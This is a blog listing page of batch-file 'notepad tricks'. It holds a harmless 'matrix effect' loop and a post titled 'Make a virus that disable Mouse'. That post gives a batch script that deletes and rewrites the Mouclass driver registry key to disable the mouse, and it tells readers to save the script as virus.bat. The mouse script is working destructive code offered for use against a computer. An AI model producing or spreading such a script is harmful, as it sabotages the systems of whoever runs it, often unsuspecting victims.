Showing posts with label Batch Programing. Show all posts

Matrix Effect using notepad



   This is amazing notepad trick which will display matrix effect like you might have seen in movies, that is numbers flashes in green colour. Basically we will be creating a small batch file in notepad.
  • Go to Notepad and copy below codes
@echo off

color 02

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start
  • Save this file as matrix.bat 
  • Now open this file as see matrix effect on your screen.


Read more

Make a virus that disable Mouse



today we will be making a batch virus which is harmfull it will disable your mouseso think before trying it on yourself.
  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as  virus.bat
  • Done you just created your virus.


Read more

Follow me on facebook